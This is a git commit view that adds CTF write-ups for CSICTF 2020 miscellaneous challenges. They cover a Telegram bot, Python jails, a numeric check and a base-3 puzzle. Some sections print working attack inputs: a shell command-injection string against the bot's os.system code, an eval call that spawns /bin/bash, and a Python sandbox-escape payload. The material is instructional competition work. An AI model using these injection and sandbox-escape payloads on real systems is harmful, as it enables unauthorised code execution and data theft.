180010027
/
CSICTF-Writeups
1
1
Fork 0
Code Issues Pull Requests Releases Wiki Activity
Browse Source

Added Miscellaneous Challenges

master
rishitsaiya 4 years ago
parent
783e212ca7
commit
aca8780568
11 changed files with 556 additions and 0 deletions
Whitespace
Show all changes Ignore whitespace when comparing lines Ignore changes in amount of whitespace Ignore changes in whitespace at EOL
Split View
Diff Options
Show Stats Download Patch File Download Diff File
  1. 34
      Miscellaneous/BroBot/README.md
  2. BIN
      Miscellaneous/Escape Plan/Flag.png
  3. 84
      Miscellaneous/Escape Plan/README.md
  4. 226
      Miscellaneous/Friends/README.md
  5. 38
      Miscellaneous/Friends/namo.py
  6. 51
      Miscellaneous/Machine Fix/README.md
  7. 21
      Miscellaneous/Machine Fix/code.py
  8. 8
      Miscellaneous/Machine Fix/flag.py
  9. BIN
      Miscellaneous/No DIStractions/Flag.png
  10. 15
      Miscellaneous/No DIStractions/README.md
  11. 79
      Miscellaneous/Prison Break/README.md

34
Miscellaneous/BroBot/README.md
View File

@ -0,0 +1,34 @@
## BroBot
The main idea finding the flag is just using Bot to get the flag.
#### Step-1:
I tried `/about` to get information about the bot and got this:
```python
CTF - https://ctf.csivit.com/
Our Team - https://ctftime.org/team/77170/
Homepage - https://csivit.com/
Contribute - https://github.com/alias-rahil/speakingbot.git/
CTF Support - https://discord.com/invite/9wHPB2B/
BoT Support - @alias_rahil
```
#### Step-2:
I used `/text2voice`. I linked to the source of the bot. It writes our text as `arg` for `echo` in a bash script. Then pipes the script's output to `espeak` to get the sound.
#### Step-3:
I got this from [writeup](https://github.com/goswami-rahul/ctf/tree/master/csictf2020/brobot) to execute.
```bash
fs = open(f"/home/ctf/{update.message.from_user.id}", "w")
fs.write(f"echo '{text}'")
fs.close()
os.system(
f"su ctf -c 'sh /home/ctf/{update.message.from_user.id} | espeak -w /home/ctf/{update.message.from_user.id}.wav --stdin'"
)
```
Then a simple `';cat flag.txt;'` gives us the answer.
#### Step-4:
Finally the flag becomes:
`csictf{ai_will_take_over_the_world}`

BIN
Miscellaneous/Escape Plan/Flag.png
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 18 KiB

84
Miscellaneous/Escape Plan/README.md
View File

@ -0,0 +1,84 @@
## Escape Plan
The main idea finding the flag is just spawning into a sandbox.
#### Step-1:
When we run `nc chall.csivit.com 30419`, we are greeted with,
```bash
Welcome to cipher decoder, an open-source script in python!
EXAMPLES:
shift_cipher_key('hello', 25)
shift_cipher_bruteforce('hello')
encrypt_vigenere('TEXT', 'KEY')
decrypt_vigenere('DIVD', 'KEY')
Currently supported ciphers:
shift_cipher_key(text, shift)
shift_cipher_bruteforce(text)
encrypt_vigenere(plaintext, key)
decrypt_vigenere(ciphertext, key)
To exit:
exit()
I am constantly trying to make this cipher decoder better and more secure! Help me add support to more ciphers by submitting a PR!
Hope it helps you!
```
#### Step-2:
So to escape, I tried `eval('__import__("os").system("/bin/bash")')` and I was in.
Once in I directly checked, `ls -al`, and I got this:
```bash
total 20
drwxr-x--- 1 root ctf 4096 Jul 22 06:35 .
drwxr-xr-x 1 root root 4096 Jul 26 16:58 ..
drwxr-x--- 1 root ctf 4096 Jul 22 06:27 .git
-rwxr-x--- 1 root ctf 2654 Jul 22 06:27 crypto.py
-rwxr-x--- 1 root ctf 52 Jul 22 06:27 start.sh
```
#### Step-3:
I checked other files, but I will stick to procedure here. Since the description involved a PR, I checked `.git` first by `cd .git`. I got usual files:
```bash
COMMIT_EDITMSG
HEAD
config
description
hooks
index
info
logs
objects
packed-refs
refs
```
At this point, I generally check `logs` to get an overview over the changes in the repo, but here the permission was denied.
#### Step-4:
So, I checked config files by `cat config` and I got this:
```bash
[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
[remote "origin"]
url = https://github.com/alias-rahil/crypto-cli
fetch = +refs/heads/*:refs/remotes/origin/*
[branch "master"]
remote = origin
merge = refs/heads/master
```
#### Step-4:
Now, I got a URL and checked at the given head and got the flag.
<img src="Flag.png">
#### Step-5:
Finally the flag becomes:
`csictf{2077m4y32_h45_35c4p3d}`

226
Miscellaneous/Friends/README.md
View File

@ -0,0 +1,226 @@
## Friends
The main idea finding the flag is just parsing the input smartly.
#### Step-1:
When we download `namo.py`, we are greeted with:
```python
import math
import sys
def fancy(x):
a = (1/2) * x
b = (1/2916) * ((27 * x - 155) ** 2)
c = 4096 / 729
d = (b - c) ** (1/2)
e = (a - d - 155/54) ** (1/3)
f = (a + d - 155/54) ** (1/3)
g = e + f + 5/3
return g
def notfancy(x):
return x**3 - 5*x**2 + 3*x + 10
def mathStuff(x):
if (x < 3 or x > 100):
exit()
y = fancy(notfancy(x))
if isinstance(y, complex):
y = float(y.real)
y = round(y, 0)
return y
print("Enter a number: ")
sys.stdout.flush()
x = round(float(input()), 0)
if x == mathStuff(x):
print('Fail')
sys.stdout.flush()
else:
print(open('namo.txt').read())
sys.stdout.flush()
```
#### Step-2:
So I tried basic numbers and it worked according to the given algorithm but however, we could try a float `nan` and then I ran it along with the remote server to enter the `else` condition at the end.
```bash
echo nan | nc chall.csivit.com 30425
```
Output:
```bash
Enter a number:
Mitrooon
bhaiyo aur behno "Enter a number"
mann ki baat nambar
agar nambar barabar 1 hai {
bhaiyo aur behno "s"
}
nahi toh agar nambar barabar 13 hai {
bhaiyo aur behno "_"
}
nahi toh agar nambar barabar 15 hai {
bhaiyo aur behno "5"
}
nahi toh agar nambar barabar 22 hai {
bhaiyo aur behno "4"
}
nahi toh agar nambar barabar 28 hai {
bhaiyo aur behno "k"
}
nahi toh agar nambar barabar 8 hai {
bhaiyo aur behno "y"
}
nahi toh agar nambar barabar 17 hai {
bhaiyo aur behno "4"
}
nahi toh agar nambar barabar 9 hai {
bhaiyo aur behno "_"
}
nahi toh agar nambar barabar 4 hai {
bhaiyo aur behno "t"
}
nahi toh agar nambar barabar 3 hai {
bhaiyo aur behno "c"
}
nahi toh agar nambar barabar 20 hai {
bhaiyo aur behno "r"
}
nahi toh agar nambar barabar 12 hai {
bhaiyo aur behno "n"
}
nahi toh agar nambar barabar 0 hai {
bhaiyo aur behno "c"
}
nahi toh agar nambar barabar 23 hai {
bhaiyo aur behno "t"
}
nahi toh agar nambar barabar 27 hai {
bhaiyo aur behno "0"
}
nahi toh agar nambar barabar 10 hai {
bhaiyo aur behno "n"
}
nahi toh agar nambar barabar 11 hai {
bhaiyo aur behno "4"
}
nahi toh agar nambar barabar 7 hai {
bhaiyo aur behno "m"
}
nahi toh agar nambar barabar 25 hai {
bhaiyo aur behno "c"
}
nahi toh agar nambar barabar 24 hai {
bhaiyo aur behno "_"
}
nahi toh agar nambar barabar 6 hai {
bhaiyo aur behno "{"
}
nahi toh agar nambar barabar 16 hai {
bhaiyo aur behno "_"
}
nahi toh agar nambar barabar 18 hai {
bhaiyo aur behno "_"
}
nahi toh agar nambar barabar 2 hai {
bhaiyo aur behno "i"
}
nahi toh agar nambar barabar 5 hai {
bhaiyo aur behno "f"
}
nahi toh agar nambar barabar 19 hai {
bhaiyo aur behno "g"
}
nahi toh agar nambar barabar 14 hai {
bhaiyo aur behno "1"
}
nahi toh agar nambar barabar 21 hai {
bhaiyo aur behno "3"
}
nahi toh agar nambar barabar 26 hai {
bhaiyo aur behno "0"
}
nahi toh agar nambar barabar 29 hai {
bhaiyo aur behno "}"
}
nahi toh {
bhaiyo aur behno ""
}
achhe din aa gaye
```
#### Step-3:
Simple substitution like 0=c, 1=s, 2=i in the context of flag like `csictf{`, would also work. Instead I got this script to get the flag.
```bash
echo nan | nc chall.csivit.com 30425 | grep -A1 'hai {' | sed 's/agar nambar barabar //' | sed 's/nahi toh //' | sed 's/ hai {$/ =/' | sed 's/^\tbhaiyo aur behno \"//' | sed 's/\"$//' | sed 's/--//' | sed ':a;N;$!ba;s/=\n/ /g' | sort -n | uniq | awk '{print $2}' | tr -d '\n'; echo ''
```
This is a 1 liner and we get the flag after this.
#### Step-5:
Finally the flag becomes:
`csictf{my_n4n_15_4_gr34t_c00k}`

38
Miscellaneous/Friends/namo.py
View File

@ -0,0 +1,38 @@
import math
import sys
def fancy(x):
a = (1/2) * x
b = (1/2916) * ((27 * x - 155) ** 2)
c = 4096 / 729
d = (b - c) ** (1/2)
e = (a - d - 155/54) ** (1/3)
f = (a + d - 155/54) ** (1/3)
g = e + f + 5/3
return g
def notfancy(x):
return x**3 - 5*x**2 + 3*x + 10
def mathStuff(x):
if (x < 3 or x > 100):
exit()
y = fancy(notfancy(x))
if isinstance(y, complex):
y = float(y.real)
y = round(y, 0)
return y
print("Enter a number: ")
sys.stdout.flush()
x = round(float(input()), 0)
if x == mathStuff(x):
print('Fail')
sys.stdout.flush()
else:
print(open('namo.txt').read())
sys.stdout.flush()

51
Miscellaneous/Machine Fix/README.md
View File

@ -0,0 +1,51 @@
## Machine Fix
The main idea finding the flag is just understanding the algorithm.
#### Step-1:
After I downloaded `code.py`, I tried to understand the workflow here:
```python
def convert (n):
if n == 0:
return '0'
nums = []
while n:
n, r = divmod(n, 3)
nums.append(str(r))
return ''.join(reversed(nums))
count=0
n=1
while(n<=523693181734689806809285195318):
str1=convert(n)
str2=convert(n-1)
str2='0'*(len(str1)-len(str2))+str2
for i in range(len(str1)):
if(str1[i]!=str2[i]):
count+=1
n+=1
print(count)
```
#### Step-2:
For every number n, n and n - 1 are converted to base 3 & then, the program compare the digits, the number of differences is added to total.
So I wrote a simple `flag.py` script to get flag:
```python
def flag(n):
sum = 0
while (n > 0):
sum += n
n //= 3
return sum
print(flag(523693181734689806809285195318))
```
On running it by `python3 flag.py`
#### Step-3:
Finally the flag becomes:
`csictf{785539772602034710213927792950}`

21
Miscellaneous/Machine Fix/code.py
View File

@ -0,0 +1,21 @@
def convert (n):
if n == 0:
return '0'
nums = []
while n:
n, r = divmod(n, 3)
nums.append(str(r))
return ''.join(reversed(nums))
count=0
n=1
while(n<=523693181734689806809285195318):
str1=convert(n)
str2=convert(n-1)
str2='0'*(len(str1)-len(str2))+str2
for i in range(len(str1)):
if(str1[i]!=str2[i]):
count+=1
n+=1
print(count)

8
Miscellaneous/Machine Fix/flag.py
View File

@ -0,0 +1,8 @@
def flag(n):
sum = 0
while (n > 0):
sum += n
n //= 3
return sum
print(flag(523693181734689806809285195318))

BIN
Miscellaneous/No DIStractions/Flag.png
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 156 KiB

15
Miscellaneous/No DIStractions/README.md
View File

@ -0,0 +1,15 @@
## No DIStractions
The main idea finding the flag is getting the flag from Discord Bot.
#### Step-1:
The tag `Discord` clearly implies that you have to check something out there. So, I went to misc channel and checked out this bot called `Kuwu`.
#### Step-2:
After trying `flag`, `./flag`, etc., it worked on `.flag`.
<img src ="Flag.png">
#### Step-3:
Finally the flag becomes:
`csictf{m0r3_huMaN_than_Y0u}`

79
Miscellaneous/Prison Break/README.md
View File

@ -0,0 +1,79 @@
## Prison Break
The main idea finding the flag is just escaping Python Sandbox.
#### Step-1:
After I ran `nc chall.csivit.com 30407`, we get this a python sandbox.
I tried various commands like flag and ctf and all, but nothing worked.
#### Step-2:
Thanks to organiser, they gave some hint: https://ctf-wiki.github.io/ctf-wiki/pwn//linux/sandbox/python-sandbox-escape/
#### Step-3:
There I got this 1 liner to escape the sandbox.
**Payload:**
```python
print(().__class__.__bases__[0].__subclasses__()[40](__file__).read())
```
I got the source code, which had the flag.
```python
#!/usr/bin/python
import sys
class Sandbox(object):
def execute(self, code_string):
exec(code_string)
sys.stdout.flush()
sandbox = Sandbox()
_raw_input = raw_input
main = sys.modules["__main__"].__dict__
orig_builtins = main["__builtins__"].__dict__
builtins_whitelist = set((
#exceptions
'ArithmeticError', 'AssertionError', 'AttributeError', 'Exception',
#constants
'False', 'None', 'True',
#types
'basestring', 'bytearray', 'bytes', 'complex', 'dict',
#functions
'abs', 'bin', 'dir', 'help'
# blocked: eval, execfile, exit, file, quit, reload, import, etc.
))
for builtin in orig_builtins.keys():
if builtin not in builtins_whitelist:
del orig_builtins[builtin]
print("Find the flag.")
sys.stdout.flush()
def flag_function():
flag = "csictf{m1ch34l_sc0fi3ld_fr0m_pr1s0n_br34k}"
while 1:
try:
sys.stdout.write(">>> ")
sys.stdout.flush()
code = _raw_input()
sandbox.execute(code)
except Exception:
print("You have encountered an error.")
sys.stdout.flush()
```
#### Step-4:
Finally the flag becomes:
`csictf{m1ch34l_sc0fi3ld_fr0m_pr1s0n_br34k}`
Write Preview
Loading…
Cancel
Save